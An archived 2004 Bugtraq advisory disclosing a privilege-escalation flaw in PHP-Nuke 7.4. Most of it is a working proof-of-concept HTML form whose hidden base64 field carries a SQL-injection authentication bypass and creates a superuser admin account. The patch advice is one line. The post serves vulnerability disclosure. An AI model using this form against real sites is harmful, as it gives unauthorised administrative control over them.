[36379] in bugtraq

home help back first fref pref prev next nref lref last post

[XSS] PHP-Nuke 7.4 Remote Privilege Escalation

daemon@ATHENA.MIT.EDU (Pierquinto Manco)
Fri Sep 3 13:53:21 2004

Date: 3 Sep 2004 12:50:59 -0000
Message-ID: <20040903125059.31903.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Pierquinto Manco <mantra@ntj.it>
To: bugtraq@securityfocus.com



**************************************************************
* 			CODEBUG Labs
* Advisory #1
* Title: AddAdmin Bug
* Author: Pierquinto 'Mantra' Manco
* Product: PHP-Nuke 7.4
* Type: XSS
* Web: http://www.mantralab.org [ITALIAN SITE]
*
**************************************************************

		Remote Privilege Escalation

- ) Description
PHP-Nuke is a very bugged web CMS, version 7.4 has critical
XSS bug that permit to an attacker to gain Admin access 
to the system.
The bug is very old but we can bypass the patch sending data 
by POST instead of GET.

- ) Proof-of-Concept
Create a HTML file with this lines:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
  <p>USERNAME: 
    <input type="text" name="add_aid">
    <br>
    NOME: 
    <input type="text" name="add_name">
    <br>
    PASSWORD: 
    <input type="text" name="add_pwd">
    <br>
    E-MAIL: 
    <input type="text" name="add_email">
    <br>
    <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
    <br>
    <input type="hidden" name="add_radminsuper" value="1">
    <br>
    <input type="hidden" name="op" value="AddAuthor">
  </p>
  <p>
    <input type="submit" name="Submit" value="Create Admin">
    <br>
  </p>
</form>


- ) Patch

Put in admin.php a routine to check GET and POST global array.
(maybe COOKIE too)


**************************************************************
		http://www.mantralab.org
                  admin@mantralab.org
**************************************************************
home help back first fref pref prev next nref lref last post